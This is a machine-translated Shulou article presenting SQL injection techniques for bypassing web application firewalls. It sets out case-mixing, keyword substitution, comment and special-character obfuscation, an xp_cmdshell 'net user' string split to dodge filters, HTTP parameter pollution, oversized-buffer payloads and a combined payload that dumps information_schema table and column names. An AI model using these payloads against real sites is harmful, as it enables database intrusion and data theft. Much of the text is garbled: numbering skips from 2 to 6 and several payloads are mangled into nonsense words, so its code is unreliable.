Shulou(Shulou.com)05/31 Report--

This article will explain in detail the nine ways of SQL injection to bypass the Web application firewall. The content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

The main function of Web Application Firewall (WAF) is to filter, monitor and block all kinds of HTTP traffic in and out of Web applications. WAF is different from regular firewalls because WAF can filter the content of specific Web applications, while regular firewalls act as security gates between servers. By checking HTTP traffic, it can prevent attacks from security vulnerabilities in Web applications, such as SQL injection, XSS, file inclusion, and security configuration errors.

How does WAF work?

Protocol anomaly detection: reject requests that do not conform to the HTTP standard

Enhanced input validation: proxy and server-side validation, not just client-side validation

Whitelist and blacklist

Rule-based and exception-based protection: rule-based blacklist mechanism is more dependent, exception-based protection is more flexible

State management: focus on session protection: Cookie protection, anti-intrusion avoidance technology, response monitoring and information disclosure protection.

How do I bypass WAF?

1. When we do a SQL injection test at the target URL, we can trigger the WAF protection by changing the case of the letters in the injection statement. If WAF uses a case-sensitive blacklist, changing case may help us successfully bypass WAF filtering.

Http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

two。 Keyword substitution (characters to be filtered by WAF can be inserted in the middle of keywords)-for example, SELECT can be inserted into SEL ascii () sleep () = > benchmark () concat_ws () = > group_concat () substr ((select 'password'), 1) = 0x70 strcmp (left (' password',1), 0x69) = 1 strcmp (left ('password',1), 0x70) = 0 strcmp (left (' password',1)) 0x71) =-1mid (), substr () = > substring () @ @ user = = > user () @ @ datadir = = > datadir ()

6. Use special symbols

Here I regulate all non-alphanumeric characters into the category of special symbols, which have special meanings and usage.

+ `symbol: select `version () `; + -: select+id-1+1.from users;+ @: select@ ^ 1.from users;+Mysql function () as xxx+`, ~,!, @,%, (), [],., -, +, |,

Example

'se'+'lec'+'t'% S%E%L%E%C%T 1 1.aspxroomid exec (' ma'+'ster..x'+'p_cm'+'dsh'+'ell "net user')'or-+ 2 id=1+ (UnI) (oN) + (SeL) (EcT)

7.HTTP parameter control

Confuse WAF by providing a set of values with multiple parameters = the same name. For example, in some cases (such as using Apache/PHP), the application will parse only the last (second) id= and WAF will parse only the first id=. To the application, this appears to be a legitimate request, so the application receives and processes these malicious inputs. Today, most WAF are not affected by HTTP parameter pollution (HPP), but it is still worth a try.

+ HPP (HTTP Parameter Polution))

/? id=1;select+1,2,3+from+users+where+id=1- /? id=1;select+1&id=2,3+from+users+where+id=1- /? id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

HPP is also called repetitive parameter pollution. The simplest one is uid=1&uid=2&uid=3. For this case, different Web servers deal with it in the following ways:

+ HPF (HTTP Parameter Fragment)

This method is HTTP split injection, which is similar to CRLF (using control characters% 0a,% 0d, etc., to perform line breaks)

/?

+ HPC (HTTP Parameter Contamination)

RFC2396 defines the following characters:

Unreserved: a murz, Amurz, 0-9 and. ! ~ *'() Reserved:; /?: @ & amp = + $, Unwise: {} |\ ^ [] `

Different Web servers have different logic when processing specially constructed requests:

Take the magic character% as an example, Asp/Asp.net will be affected

8. Buffer overflow

WAF, like all other applications, has a variety of flaws and vulnerabilities. If a buffer overflow occurs, the WAF may crash, and even if the code cannot be executed, it will prevent WAF from working properly. In this way, the security protection of WAF will naturally be disintegrated.

? id=1 and (select 1) = (Select 0xA*1000) + UnIoN+SeLeCT+1,2,version (), 4, user (), 8, 9, 10, 11, 13, 14, 15, 17, 18, 19, 19, 20, 22, 23, 24, 25, 26.

9. Integration bypass

When using a single way can not be bypassed, we can flexibly combine a variety of ways to try.

Target.com/index.php?page_id=-15+and+ (select 1) = (Select 0xAA [.. (add about 1000 "A").]) + / *! Unicorned motifs SeLeCTures 1, 2 table_name*/ concat (/ *! table_name*/) + FrOM / * information_schema*/.tables / *! WHERE * / + / *! TaBlE_ScHeMa*/+like+database ()--? idling Letters 725 packs / unionaries / *! TaBlE_ScHeMa*/+like+database ()--? idling lashes 725 packs / unionizations, COLUMN_NAME, 3pr 4: 5 flags, infomations, schematics, schematics, .COLUMNSs whirlpool TABLENAME0x41646d696e-what are the nine ways SQL injects firewalls around Web applications I hope the above content can be of some help to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.